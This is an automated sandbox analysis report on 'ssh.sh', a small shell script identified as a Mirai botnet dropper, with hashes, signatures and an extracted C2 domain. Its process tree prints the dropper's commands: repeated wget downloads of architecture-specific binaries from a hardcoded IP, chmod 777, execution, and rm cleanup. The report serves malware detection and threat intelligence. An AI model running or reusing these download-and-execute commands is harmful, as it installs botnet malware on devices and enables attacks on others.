Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
23-11-2024 17:20
Static task
static1
Behavioral task
behavioral1
Sample
ssh.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ssh.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ssh.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ssh.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ssh.sh
-
Size
639B
-
MD5
61f6f361a8641428ec15e652569064b8
-
SHA1
f3c5b2338ce425c32eec3abd2310ba992bd3ab94
-
SHA256
ce3ca0522b38c3931522cac2f1218dbc231624674dcc80ce76b4a26ecffdd8f1
-
SHA512
0402ef7c2bd4100f3c40ec5d2a60fe1060cd5a42f4762dd398e685db82abd221df7f260be27a3c95394ba7b0665556b2e22f860f23bf6fceda6651e1048471fe
Malware Config
Extracted
mirai
gay.nguyenletriloc.pro
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodpid process 724 chmod 735 chmod 745 chmod 755 chmod 689 chmod 704 chmod 712 chmod 717 chmod -
Deletes itself 3 IoCs
Processes:
main_armmain_arm5main_arm7pid process 691 main_arm 705 main_arm5 718 main_arm7 -
Executes dropped EXE 8 IoCs
Processes:
main_armmain_arm5main_arm6main_arm7armarm5arm6arm7ioc pid process /var/tmp/main_arm 691 main_arm /var/tmp/main_arm5 705 main_arm5 /var/tmp/main_arm6 713 main_arm6 /var/tmp/main_arm7 718 main_arm7 /var/tmp/arm 725 arm /var/tmp/arm5 736 arm5 /var/tmp/arm6 747 arm6 /var/tmp/arm7 756 arm7 -
Traces itself 6 IoCs
Traces itself to prevent debugging attempts
Processes:
main_armmain_arm5main_arm7pid process 691 main_arm 692 main_arm 705 main_arm5 706 main_arm5 718 main_arm7 719 main_arm7 -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Changes its process name 3 IoCs
Processes:
main_armmain_arm5main_arm7description ioc pid process Changes the process name, possibly in an attempt to hide itself httpd 691 main_arm Changes the process name, possibly in an attempt to hide itself httpd 705 main_arm5 Changes the process name, possibly in an attempt to hide itself httpd 718 main_arm7
Processes
-
/tmp/ssh.sh/tmp/ssh.sh1⤵PID:666
-
/bin/rmrm -rf main_arm2⤵PID:667
-
-
/usr/bin/wgetwget http://66.36.234.2/main_arm -O -2⤵PID:673
-
-
/bin/chmodchmod 777 main_arm2⤵
- File and Directory Permissions Modification
PID:689
-
-
/var/tmp/main_arm./main_arm avtech2⤵
- Deletes itself
- Executes dropped EXE
- Traces itself
- Changes its process name
PID:691
-
-
/bin/rmrm -rf main_arm2⤵PID:693
-
-
/bin/rmrm -rf main_arm52⤵PID:696
-
-
/usr/bin/wgetwget http://66.36.234.2/main_arm5 -O -2⤵PID:697
-
-
/bin/chmodchmod 777 main_arm52⤵
- File and Directory Permissions Modification
PID:704
-
-
/var/tmp/main_arm5./main_arm5 avtech2⤵
- Deletes itself
- Executes dropped EXE
- Traces itself
- Changes its process name
PID:705
-
-
/bin/rmrm -rf main_arm52⤵PID:707
-
-
/bin/rmrm -rf main_arm62⤵PID:709
-
-
/usr/bin/wgetwget http://66.36.234.2/main_arm6 -O -2⤵PID:710
-
-
/bin/chmodchmod 777 main_arm62⤵
- File and Directory Permissions Modification
PID:712
-
-
/var/tmp/main_arm6./main_arm6 avtech2⤵
- Executes dropped EXE
PID:713
-
-
/bin/rmrm -rf main_arm62⤵PID:714
-
-
/bin/rmrm -rf main_arm72⤵PID:715
-
-
/usr/bin/wgetwget http://66.36.234.2/main_arm7 -O -2⤵PID:716
-
-
/bin/chmodchmod 777 main_arm72⤵
- File and Directory Permissions Modification
PID:717
-
-
/var/tmp/main_arm7./main_arm7 avtech2⤵
- Deletes itself
- Executes dropped EXE
- Traces itself
- Changes its process name
PID:718
-
-
/bin/rmrm -rf main_arm72⤵PID:720
-
-
/bin/rmrm -rf arm2⤵PID:722
-
-
/usr/bin/wgetwget http://66.36.234.2/arm -O -2⤵PID:723
-
-
/bin/chmodchmod 777 arm2⤵
- File and Directory Permissions Modification
PID:724
-
-
/var/tmp/arm./arm avtech2⤵
- Executes dropped EXE
PID:725
-
-
/bin/sh/bin/sh ./arm avtech2⤵PID:725
-
-
/bin/rmrm -rf arm2⤵PID:727
-
-
/bin/rmrm -rf arm52⤵PID:730
-
-
/usr/bin/wgetwget http://66.36.234.2/arm5 -O -2⤵PID:731
-
-
/bin/chmodchmod 777 arm52⤵
- File and Directory Permissions Modification
PID:735
-
-
/var/tmp/arm5./arm5 avtech2⤵
- Executes dropped EXE
PID:736
-
-
/bin/sh/bin/sh ./arm5 avtech2⤵PID:736
-
-
/bin/rmrm -rf arm52⤵PID:739
-
-
/bin/rmrm -rf arm62⤵PID:740
-
-
/usr/bin/wgetwget http://66.36.234.2/arm6 -O -2⤵PID:742
-
-
/bin/chmodchmod 777 arm62⤵
- File and Directory Permissions Modification
PID:745
-
-
/var/tmp/arm6./arm6 avtech2⤵
- Executes dropped EXE
PID:747
-
-
/bin/sh/bin/sh ./arm6 avtech2⤵PID:747
-
-
/bin/rmrm -rf arm62⤵PID:749
-
-
/bin/rmrm -rf arm72⤵PID:750
-
-
/usr/bin/wgetwget http://66.36.234.2/arm7 -O -2⤵PID:752
-
-
/bin/chmodchmod 777 arm72⤵
- File and Directory Permissions Modification
PID:755
-
-
/var/tmp/arm7./arm7 avtech2⤵
- Executes dropped EXE
PID:756
-
-
/bin/sh/bin/sh ./arm7 avtech2⤵PID:756
-
-
/bin/rmrm -rf arm72⤵PID:760
-
-
/bin/rmrm /tmp/ssh.sh2⤵PID:761
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
130KB
MD5b5b7f0c68cdf6458e137e7dfb1d74e6f
SHA1ceb4700b167cff05ccb77a25260bf696b39b8e63
SHA2566017dc10e1edd004384c5b0033e237a81e293d8668459c107f057fbdc62f771c
SHA512acdcee90b0ff85e4ed35ba3ab254065b43645ddc0242f097392f8b49967642a95d393b43e039c84aa5e9c52dbfd5efd27a441162227ac3b9b169226c228a3c3d
-
Filesize
130KB
MD5b3d2c1afb1984b43648625b48eb1373e
SHA13592776c6e0f9e67c38c5a8bfff7da67629b6713
SHA2567066eea40920fc2a9a029276906a8fd8188f501f7c14078116e0523e667687a2
SHA5120f739303ac523d66eb032500f7bfd48bc5fa5f26bac43124a4d2564ae1a5558dfcfae7a70e45907ba7d15a82ae01d507fdd78a97de3050b5a982dcf7a5c3d627
-
Filesize
142KB
MD5daa33b1e666b1386b51ff9793150fdff
SHA1999d619976b11ae71e575ced094011f0b95b1905
SHA256d47526004f78450ce96e34f8cbb0a77a12d7aa083ff4e497a67ca65130bca32e
SHA512c351a078605d2870a643b1822d3fcf412aad81e20a4d1dc6c505f09c64c81881d75feb1c4e6bea60814191bf3b984a2b080a950a1aa29b3cc920affd48be9fa6
-
Filesize
179KB
MD50523d595f7f8b7b8bf05cb804de5f32f
SHA15fcd1fb36f56d96c9185ce454613946f7161df4d
SHA2567045550dcae0e634c84ac8729c51c0972de3ec326d6541d48d2fc3fbc8c59093
SHA512079cd6dfe752a3024837909873b6fe029fe5171ec25cd081a39b36652c52f42d75b321e3acd48e37f43f3409f82448a02b94d7eefbfe5a7ccbd73e131290439b